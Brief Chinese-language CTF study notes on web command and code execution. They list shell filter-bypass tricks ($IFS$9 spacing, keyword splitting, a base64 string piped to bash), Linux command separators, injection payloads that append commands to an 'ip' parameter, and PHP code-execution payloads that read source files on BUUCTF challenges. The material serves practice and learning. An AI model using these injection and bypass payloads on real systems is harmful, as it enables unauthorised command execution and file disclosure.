web安全之命令执行、代码执行

基本知识

php中函数与语言结构的区别
读取文件函数：readfile('')  highlight_file('')
输出函数：echo   print_r     
输入函数：

bypass绕过

空格：$IFS$9  $(IFS)
关键字flag：fl\ag    拼接ab    反引号`ls`
无回显：
base64编码绕过：echo Y2F0IGZsYWcucGhw|base64 -d|bash     //cat flag.php

linux命令连接符:
A;B //先执行A，再执行B
A|B //只执行B那条命令
A||B //A执行失败才会执行B
A&B //AB两条命令都会执行
A&&B //A执行成功才会执行B

命令执行举例：#BUUCTF 【pingpingping-WP】

?ip=127.0.0.1;ls;
/?ip=127.0.0.1;cat flag.php;
?ip=127.0.0.1;cat$IFS$9flag.php;
?ip=127.0.0.1;a=g;tac$IFS$9fla$a.php;

代码执行举例：#BUUCTF 【禁止套娃-WP】

githack扫描出源代码-->分析源代码-->绕过:
?exp=show_source(array_rand(array_flip(scandir(current(localeconv())))));
?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));